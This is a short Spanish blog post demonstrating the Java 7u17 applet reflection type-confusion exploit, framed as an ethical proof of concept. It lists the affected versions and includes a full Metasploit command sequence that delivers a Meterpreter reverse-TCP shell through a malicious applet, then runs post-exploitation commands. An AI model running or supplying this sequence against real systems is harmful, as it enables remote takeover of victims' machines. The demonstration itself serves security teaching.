Bug en Java 7u17 (Video MSF) [Applet Reflection Type Confusion RCE]

No Comments


Y nuevamente Java con sus bugs que afectan a la seguridad de nuestros entornos de trabajo bueno para algunos ya que para otros esto es una fuente mas para sus fechorias pero iremos a lo etico y hacer nuestras PoC, asi que en esta oportunidad venimos con una entrada desde  el mas allá bueno no del mas allá pero si esta vez con una desde eromang donde nos explica detenidamente, como explotarlo algo simple pero mas que importante para poder crecer.




Affected version(s) :
JDK and JRE 7 Update 17 and earlier

Tested on Windows XP Pro SP3 with :

JDK and JRE 7 Update 17

Description :

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :



use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo



Regards,
Snifer

0 comentarios

Publicar un comentario en la entrada